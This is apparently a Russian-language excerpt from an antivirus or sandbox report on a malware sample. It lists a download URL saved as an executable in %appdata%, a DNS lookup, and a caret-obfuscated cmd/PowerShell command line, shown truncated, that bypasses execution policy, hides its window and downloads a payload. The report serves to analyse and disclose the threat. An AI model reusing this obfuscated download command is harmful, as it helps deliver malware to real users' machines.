Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^erShE^lL^.eX^e ^-Ex^e^cu^TionP^o^L^ic^Y ^BYPa^s^S ^-^NOpRofil^e -wInDO^WSt^YLE H^I^DdEn (nEW-Obj^E^c^T sYSte^m.^N^eT^.^wE^b^cLiEn^t^).D^OWNloadfiLe^(^'http://www.zonedopesa.t...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "POW^erShE^lL^.eX^e ^-Ex^e^cu^TionP^o^L^ic^Y ^BYPa^s^S ^-^NOpRofil^e -wInDO^WSt^YLE H^I^DdEn (nEW-Obj^E^c^T sYSte^m.^N^eT^.^wE^b^cLiEn^t^).D^OWNloadfiLe^(^'http://www.zonedopesa.t...' (со скрытым окном)